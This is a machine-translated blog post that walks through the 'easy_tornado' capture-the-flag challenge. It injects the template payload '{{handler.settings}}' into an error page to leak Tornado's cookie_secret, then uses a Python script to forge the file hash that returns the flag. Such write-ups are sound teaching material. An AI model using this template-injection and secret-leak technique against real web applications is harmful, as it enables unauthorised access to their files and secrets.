当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))Succeed in getting flag.
边栏推荐
- Lattice coloring - matrix fast power optimized shape pressure DP
- Avatary's livedriver trial experience
- 【数字IC验证快速入门】11、Verilog TestBench(VTB)入门
- 【数字IC验证快速入门】17、SystemVerilog学习之基本语法4(随机化Randomization)
- [quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
- Hisense TV starts the developer mode
- 通俗易懂单点登录SSO
- 芯片 设计资料下载
- 青龙面板--花花阅读
- DNS server configuration
猜你喜欢
Leetcode medium question my schedule I
Qinglong panel - today's headlines
Call pytorch API to complete linear regression
jeeSite 表单页面的Excel 导入功能
调用 pytorch API完成线性回归
【数字IC验证快速入门】10、Verilog RTL设计必会的FIFO
Hisense TV starts the developer mode
微信小程序基本组件使用介绍
QT learning 26 integrated example of layout management
The charm of SQL optimization! From 30248s to 0.001s
随机推荐
Relevant data of current limiting
Complex network modeling (I)
Content of string
Myabtis_Plus
快解析内网穿透为文档加密行业保驾护航
Topic not received? Try this
Uniapp mobile terminal forced update function
Téléchargement des données de conception des puces
Avatary的LiveDriver试用体验
C语言队列
[quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
Avatary's livedriver trial experience
[quickstart to Digital IC Validation] 15. Basic syntax for SystemVerilog Learning 2 (operator, type conversion, loop, Task / Function... Including practical exercises)
OpenJudge NOI 2.1 1752:鸡兔同笼
Niu Mei's mathematical problem --- combinatorial number
复杂网络建模(一)
【数字IC验证快速入门】15、SystemVerilog学习之基本语法2(操作符、类型转换、循环、Task/Function...内含实践练习)
Unityhub cracking & unity cracking
Leetcode 187 Repeated DNA sequence (2022.07.06)
WARNING: Retrying (Retry(total=4, connect=None, read=None, redirect=None, status=None)) after conne